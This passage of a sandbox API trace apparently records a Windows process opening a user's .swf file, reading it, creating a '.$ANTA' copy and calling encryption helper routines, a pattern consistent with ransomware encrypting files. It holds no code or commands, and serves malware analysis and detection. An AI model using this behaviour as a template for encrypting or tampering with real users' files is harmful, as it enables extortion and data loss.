(lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\vbqewbi.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0107.560] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.560] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0107.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.615] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0107.615] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0107.615] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0107.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0107.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0107.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0107.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0107.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43eb888 [0107.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ba8 [0107.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0107.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7f98 [0107.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb888 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ba8 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0107.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0107.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ba8 [0107.617] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ba8 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7f98 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0107.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0107.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0107.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0107.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0107.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0107.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\vbqewbi.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.618] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0107.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0107.619] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0107.619] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0107.619] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0107.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0107.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0107.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0107.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0107.622] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0107.622] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xbdbc, lpOverlapped=0x0) returned 1 [0107.623] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0107.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0107.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0107.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0107.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdbc) returned 0x4516010 [0107.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0107.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0107.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0107.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdbc) returned 0x4521dd8 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.627] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdbc) returned 0x4516010 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.627] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0107.627] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0107.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0107.628] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0107.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0107.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a30 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdbc) returned 0x4516010 [0107.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a70 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0107.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2950 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0107.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0107.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdbc) returned 0x452dba0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0107.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0107.629] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0107.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0107.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41acf40 [0107.629] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0107.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0107.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0107.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0107.630] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0107.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0107.630] 